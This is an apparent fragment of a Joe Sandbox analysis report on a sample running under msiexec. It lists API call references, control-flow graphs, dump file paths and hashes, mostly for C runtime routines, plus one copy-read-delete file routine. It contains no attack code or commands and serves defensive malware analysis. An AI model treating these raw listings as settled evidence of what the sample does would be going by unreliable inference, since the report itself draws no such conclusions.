                                                                                                                                                      • _free.LIBCMT ref: 21F57DE7
                                                                                                                                                      • _free.LIBCMT ref: 21F57DFF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                      • Opcode ID: a17eda05cfba066c97acef7ed0414c1dd19368b320d9b1870e0fdae83be85f96
                                                                                                                                                      • Instruction ID: f0f22eff7d2072d6703bd07470f4139cfb904b1771288dacf1a1c3ccffa15175
                                                                                                                                                      • Opcode Fuzzy Hash: a17eda05cfba066c97acef7ed0414c1dd19368b320d9b1870e0fdae83be85f96
                                                                                                                                                      • Instruction Fuzzy Hash: E2318F32604609FFEBA59B39E840B66BBEBEF01310F504519E878D7161DF73A981CB10

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 21F559EA
                                                                                                                                                        • Part of subcall function 21F5571E: HeapFree.KERNEL32(00000000,00000000,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?), ref: 21F55734
                                                                                                                                                        • Part of subcall function 21F5571E: GetLastError.KERNEL32(?,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?,?), ref: 21F55746
                                                                                                                                                      • _free.LIBCMT ref: 21F559F6
                                                                                                                                                      • _free.LIBCMT ref: 21F55A01
                                                                                                                                                      • _free.LIBCMT ref: 21F55A0C
                                                                                                                                                      • _free.LIBCMT ref: 21F55A17
                                                                                                                                                      • _free.LIBCMT ref: 21F55A22
                                                                                                                                                      • _free.LIBCMT ref: 21F55A2D
                                                                                                                                                      • _free.LIBCMT ref: 21F55A38
                                                                                                                                                      • _free.LIBCMT ref: 21F55A43
                                                                                                                                                      • _free.LIBCMT ref: 21F55A51
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 096e86db574bca8b4adf0a56fac44bbc999fe2c6e3dcbbcbce6c7d7e64943cd2
                                                                                                                                                      • Instruction ID: 5bc66b07bf7389b7a5615bf2d8dca2431a27cc2d8f78778efc9a34d308f28983
                                                                                                                                                      • Opcode Fuzzy Hash: 096e86db574bca8b4adf0a56fac44bbc999fe2c6e3dcbbcbce6c7d7e64943cd2
                                                                                                                                                      • Instruction Fuzzy Hash: 8811A27A52014DFFCF99DF94E841CDD3FBAEF14350B4540A5BA288B231DA32EA519B80

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 287 21f5aa53-21f5aa6e 288 21f5aa80 287->288 289 21f5aa70-21f5aa7e RtlDecodePointer 287->289 290 21f5aa85-21f5aa8b 288->290 289->290 291 21f5aa91 290->291 292 21f5abb2-21f5abb5 290->292 293 21f5aa97-21f5aa9a 291->293 294 21f5aba6 291->294 295 21f5abb7-21f5abba 292->295 296 21f5ac12 292->296 298 21f5ab47-21f5ab4a 293->298 299 21f5aaa0 293->299 297 21f5aba8-21f5abad 294->297 301 21f5ac06 295->301 302 21f5abbc-21f5abbf 295->302 300 21f5ac19 296->300 303 21f5ac5b-21f5ac6a call 21f52ada 297->303 309 21f5ab9d-21f5aba4 298->309 310 21f5ab4c-21f5ab4f 298->310 304 21f5ab34-21f5ab42 299->304 305 21f5aaa6-21f5aaab 299->305 306 21f5ac20-21f5ac49 300->306 301->296 307 21f5abc1-21f5abc4 302->307 308 21f5abfa 302->308 304->306 313 21f5ab25-21f5ab2f 305->313 314 21f5aaad-21f5aab0 305->314 334 21f5ac56-21f5ac59 306->334 335 21f5ac4b-21f5ac50 call 21f56368 306->335 315 21f5abc6-21f5abc9 307->315 316 21f5abee 307->316 308->301 312 21f5ab61-21f5ab8f 309->312 317 21f5ab94-21f5ab9b 310->317 318 21f5ab51-21f5ab54 310->318 312->334 313->306 320 21f5aab2-21f5aab5 314->320 321 21f5ab1c-21f5ab23 314->321 323 21f5abe2 315->323 324 21f5abcb-21f5abd0 315->324 316->308 317->300 318->303 325 21f5ab5a 318->325 327 21f5aab7-21f5aaba 320->327 328 21f5ab0d-21f5ab17 320->328 326 21f5aac7-21f5aaf7 321->326 323->316 329 21f5abd2-21f5abd5 324->329 330 21f5abdb-21f5abe0 324->330 325->312 326->334 341 21f5aafd-21f5ab08 call 21f56368 326->341 327->303 332 21f5aac0 327->332 328->306 329->303 329->330 330->297 332->326 334->303 335->334 341->334
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                                      • Opcode ID: 50e54006bd6fc09743165052263c950aa23c13a45b4e97da2e164a9b1906063f
                                                                                                                                                      • Instruction ID: 607bb0c8de7adb69f6624f3bac3cdd7dc8f3c9d17045bc759e71ef781c473cfc
                                                                                                                                                      • Opcode Fuzzy Hash: 50e54006bd6fc09743165052263c950aa23c13a45b4e97da2e164a9b1906063f
                                                                                                                                                      • Instruction Fuzzy Hash: 8B517E7190470AFBDB418FA4D58859C7FBBFF4A210F144689E5B0A6254C7778A38C754

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D1B
                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21F51D37
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D4B
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D58
                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D72
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D7D
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21F51D8A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1454806937-0
                                                                                                                                                      • Opcode ID: 5288cbba6e4b40cc0cd6c110dcdf82fa4a05a9d48934af1819ce82ca9d183d4d
                                                                                                                                                      • Instruction ID: 8c4af59011d80e2d90f90fe9e75c826355c5b6d558691200af6a209f30a966b8
                                                                                                                                                      • Opcode Fuzzy Hash: 5288cbba6e4b40cc0cd6c110dcdf82fa4a05a9d48934af1819ce82ca9d183d4d
                                                                                                                                                      • Instruction Fuzzy Hash: F52121B294221DBFD7109BA4CC8CFEB7BBCEB19394F000565F525D2144D6759E868B70

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 361 21f59492-21f594ef GetConsoleCP 362 21f594f5-21f59511 361->362 363 21f59632-21f59644 call 21f52ada 361->363 365 21f59513-21f5952a 362->365 366 21f5952c-21f5953d call 21f57c19 362->366 368 21f59566-21f59575 call 21f579e6 365->368 372 21f59563-21f59565 366->372 373 21f5953f-21f59542 366->373 368->363 377 21f5957b-21f5959b WideCharToMultiByte 368->377 372->368 375 21f59609-21f59628 373->375 376 21f59548-21f5955a call 21f579e6 373->376 375->363 376->363 383 21f59560-21f59561 376->383 377->363 379 21f595a1-21f595b7 WriteFile 377->379 381 21f595b9-21f595ca 379->381 382 21f5962a-21f59630 GetLastError 379->382 381->363 384 21f595cc-21f595d0 381->384 382->363 383->377 385 21f595d2-21f595f0 WriteFile 384->385 386 21f595fe-21f59601 384->386 385->382 388 21f595f2-21f595f6 385->388 386->362 387 21f59607 386->387 387->363 388->363 389 21f595f8-21f595fb 388->389 389->386
                                                                                                                                                      APIs
                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21F59C07,?,00000000,?,00000000,00000000), ref: 21F594D4
                                                                                                                                                      • __fassign.LIBCMT ref: 21F5954F
                                                                                                                                                      • __fassign.LIBCMT ref: 21F5956A
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21F59590
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,21F59C07,00000000,?,?,?,?,?,?,?,?,?,21F59C07,?), ref: 21F595AF
                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,21F59C07,00000000,?,?,?,?,?,?,?,?,?,21F59C07,?), ref: 21F595E8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                      • Opcode ID: fe456a89d639c29c2828e28dbe6decd1c7d3ce4dab43fd409cd44c22191cd007
                                                                                                                                                      • Instruction ID: b03c88dca366b6a5ace12aa442bbf5a8804c84e5dc4d292875979cfe1cca132e
                                                                                                                                                      • Opcode Fuzzy Hash: fe456a89d639c29c2828e28dbe6decd1c7d3ce4dab43fd409cd44c22191cd007
                                                                                                                                                      • Instruction Fuzzy Hash: 7B51A0B1900249BFDB14CFA8C895AEEBBF9FF09310F14411EE975E7291D6319945CB60

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 390 21f53370-21f533b5 call 21f53330 call 21f537a7 395 21f533b7-21f533c9 390->395 396 21f53416-21f53419 390->396 397 21f53439-21f53442 395->397 399 21f533cb 395->399 396->397 398 21f5341b-21f53428 call 21f53790 396->398 402 21f5342d-21f53436 call 21f53330 398->402 401 21f533d0-21f533e7 399->401 403 21f533fd 401->403 404 21f533e9-21f533f7 call 21f53740 401->404 402->397 407 21f53400-21f53405 403->407 412 21f5340d-21f53414 404->412 413 21f533f9 404->413 407->401 410 21f53407-21f53409 407->410 410->397 411 21f5340b 410->411 411->402 412->402 414 21f53443-21f5344c 413->414 415 21f533fb 413->415 416 21f53486-21f53496 call 21f53774 414->416 417 21f5344e-21f53455 414->417 415->407 422 21f53498-21f534a7 call 21f53790 416->422 423 21f534aa-21f534c6 call 21f53330 call 21f53758 416->423 417->416 419 21f53457-21f53466 call 21f5bbe0 417->419 427 21f53483 419->427 428 21f53468-21f53480 419->428 422->423 427->416 428->427
                                                                                                                                                      APIs
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 21F5339B
                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 21F533A3
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 21F53431
                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 21F5345C
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 21F534B1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                      • String ID: csm
                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                      • Opcode ID: 5de2ddd7989783243b3b3adf0ee8356679fbca6e7720c9008e8b8bc4714e022e
                                                                                                                                                      • Instruction ID: 7892d1ab9d8049156d543b56114b0d5c5458c15f42b23e083fa7cf4c4f2f485b
                                                                                                                                                      • Opcode Fuzzy Hash: 5de2ddd7989783243b3b3adf0ee8356679fbca6e7720c9008e8b8bc4714e022e
                                                                                                                                                      • Instruction Fuzzy Hash: 7C419239E04209BBCB41CF6CC880A9FBFB6AF45324F108159E9399B352D7379A05CB91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 21F59221: _free.LIBCMT ref: 21F5924A
                                                                                                                                                      • _free.LIBCMT ref: 21F592AB
                                                                                                                                                        • Part of subcall function 21F5571E: HeapFree.KERNEL32(00000000,00000000,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?), ref: 21F55734
                                                                                                                                                        • Part of subcall function 21F5571E: GetLastError.KERNEL32(?,?,21F5924F,?,00000000,?,00000000,?,21F59276,?,00000007,?,?,21F57E5A,?,?), ref: 21F55746
                                                                                                                                                      • _free.LIBCMT ref: 21F592B6
                                                                                                                                                      • _free.LIBCMT ref: 21F592C1
                                                                                                                                                      • _free.LIBCMT ref: 21F59315
                                                                                                                                                      • _free.LIBCMT ref: 21F59320
                                                                                                                                                      • _free.LIBCMT ref: 21F5932B
                                                                                                                                                      • _free.LIBCMT ref: 21F59336
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                      • Instruction ID: 66472bf037fdced20efe9c823edc5c21beb2cd8c093202f4895c2e9f8af6dba1
                                                                                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                      • Instruction Fuzzy Hash: 92118131540B09FEDEA8AFB1DD45FCF7B9FAF14740F400824AAB976062DA26B5058751

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 472 21f58821-21f5883a 473 21f58850-21f58855 472->473 474 21f5883c-21f5884c call 21f59341 472->474 475 21f58857-21f5885f 473->475 476 21f58862-21f58886 MultiByteToWideChar 473->476 474->473 481 21f5884e 474->481 475->476 479 21f5888c-21f58898 476->479 480 21f58a19-21f58a2c call 21f52ada 476->480 482 21f588ec 479->482 483 21f5889a-21f588ab 479->483 481->473 485 21f588ee-21f588f0 482->485 486 21f588ad-21f588bc call 21f5bf20 483->486 487 21f588ca-21f588db call 21f556d0 483->487 489 21f588f6-21f58909 MultiByteToWideChar 485->489 490 21f58a0e 485->490 486->490 499 21f588c2-21f588c8 486->499 487->490 500 21f588e1 487->500 489->490 493 21f5890f-21f5892a call 21f55f19 489->493 494 21f58a10-21f58a17 call 21f58801 490->494 493->490 504 21f58930-21f58937 493->504 494->480 503 21f588e7-21f588ea 499->503 500->503 503->485 505 21f58971-21f5897d 504->505 506 21f58939-21f5893e 504->506 508 21f5897f-21f58990 505->508 509 21f589c9 505->509 506->494 507 21f58944-21f58946 506->507 507->490 510 21f5894c-21f58966 call 21f55f19 507->510 512 21f58992-21f589a1 call 21f5bf20 508->512 513 21f589ab-21f589bc call 21f556d0 508->513 511 21f589cb-21f589cd 509->511 510->494 527 21f5896c 510->527 517 21f58a07-21f58a0d call 21f58801 511->517 518 21f589cf-21f589e8 call 21f55f19 511->518 512->517 524 21f589a3-21f589a9 512->524 513->517 526 21f589be 513->526 517->490 518->517 530 21f589ea-21f589f1 518->530 529 21f589c4-21f589c7 524->529 526->529 527->490 529->511 531 21f589f3-21f589f4 530->531 532 21f58a2d-21f58a33 530->532 533 21f589f5-21f58a05 WideCharToMultiByte 531->533 532->533 533->517 534 21f58a35-21f58a3c call 21f58801 533->534 534->494
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21F56FFD,00000000,?,?,?,21F58A72,?,?,00000100), ref: 21F5887B
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,21F58A72,?,?,00000100,5EFC4D8B,?,?), ref: 21F58901
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 21F589FB
                                                                                                                                                      • __freea.LIBCMT ref: 21F58A08
                                                                                                                                                        • Part of subcall function 21F556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21F55702
                                                                                                                                                      • __freea.LIBCMT ref: 21F58A11
                                                                                                                                                      • __freea.LIBCMT ref: 21F58A36
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                      • Opcode ID: efb0c4cbbc2aa82170e94e50d64ede8d21fd78b0f9c49cccd340416732bc79fe
                                                                                                                                                      • Instruction ID: 7e5f1016bd37f83bdd6939afd82e78bb0eb62d50b734955aa9a9518e19c86047
                                                                                                                                                      • Opcode Fuzzy Hash: efb0c4cbbc2aa82170e94e50d64ede8d21fd78b0f9c49cccd340416732bc79fe
                                                                                                                                                      • Instruction Fuzzy Hash: DE51E172610207FFEB598E66CC40EAB7BABEB41750F100638FD25D6180EB36EC5087A0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • _strlen.LIBCMT ref: 21F51607
                                                                                                                                                      • _strcat.LIBCMT ref: 21F5161D
                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21F5190E,?,?,00000000,?,00000000), ref: 21F51643
                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,21F5190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21F5165A
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,21F5190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21F51661
                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,21F5190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21F51686
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1922816806-0
                                                                                                                                                      • Opcode ID: 2594e545717ffe6a1166f4c2d327433d4e1583e743cdb23c41ff3b01b9059152
                                                                                                                                                      • Instruction ID: 74a47237bafb48517f7e626510c1af6590d35702e7d04b8e00f5b8981fe681fc
                                                                                                                                                      • Opcode Fuzzy Hash: 2594e545717ffe6a1166f4c2d327433d4e1583e743cdb23c41ff3b01b9059152
                                                                                                                                                      • Instruction Fuzzy Hash: 4221DA36904204BFDB44DF54DC84EFE7BB9EF89710F14401AE914AB145EB35B54187A5

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21F51038
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21F5104B
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21F51061
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21F51075
                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21F51090
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 21F510B8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                      • Opcode ID: 2915884147f6180a132f07b1ac9efe1c86a5adae522b41adf613ec3c4e7f2041
                                                                                                                                                      • Instruction ID: f83d82a4c8456fddf5050e140ede27fff11ebc6e5b0005120ebf208cb6e6c63c
                                                                                                                                                      • Opcode Fuzzy Hash: 2915884147f6180a132f07b1ac9efe1c86a5adae522b41adf613ec3c4e7f2041
                                                                                                                                                      • Instruction Fuzzy Hash: B7218336900319FBCF94DB64DC48DDB376AEF44314F104296E979971A5DA32AA86CB40
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,21F53518,21F523F1,21F51F17), ref: 21F53864
                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21F53872
                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 21F5388B
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,21F53518,21F523F1,21F51F17), ref: 21F538DD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                      • Opcode ID: ae4af9b11e63a31b5b4b08ea04f6be8645adf39e4d0774cce4730ed5e5e18d92
                                                                                                                                                      • Instruction ID: d30f91019376b8b06452a274310b780ed8e02f7baaf12da807488f5091581cca
                                                                                                                                                      • Opcode Fuzzy Hash: ae4af9b11e63a31b5b4b08ea04f6be8645adf39e4d0774cce4730ed5e5e18d92
                                                                                                                                                      • Instruction Fuzzy Hash: 6801F73364D712BEA68D567D6C84A073F97DB5677AB200239E138990E1EF1748098340
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,21F56C6C), ref: 21F55AFA
                                                                                                                                                      • _free.LIBCMT ref: 21F55B2D
                                                                                                                                                      • _free.LIBCMT ref: 21F55B55
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,21F56C6C), ref: 21F55B62
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,21F56C6C), ref: 21F55B6E
                                                                                                                                                      • _abort.LIBCMT ref: 21F55B74
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.3056212211.0000000021F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 21F50000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.3056185934.0000000021F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000009.00000002.3056212211.0000000021F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_9_2_21f50000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                      • Opcode ID: c1e905c4d431de4c1105d3dd6d59ed543ee7952b5703ad2ad5f6ec5f18164193
                                                                                                                                                      • Instruction ID: 033793b7eeafafc2450d8b371331b5a1b9294c7eb155c84fb0def9f92eb45e86
                                                                                                                                                      • Opcode Fuzzy Hash: c1e905c4d431de4c1105d3dd6d59ed543ee7952b5703ad2ad5f6ec5f18164193
                                                                                                                                                      • Instruction Fuzzy Hash: 7DF0A432545502FFD6C627346C0CE0E3A6B8FD2775B290124F938D61B1EE2B85024664
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21F54AEA,?,?,21F54A8A,?,21F62238,0000000C,21F54BBD,00000000,00000000), ref: 21F54B59
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21F54B6C
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,21F54AEA,?,?,21F54A8A,?,21F62238,0000000C,21F54BBD,00000000,00000000,?,21F52082), ref: 21F54B8F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
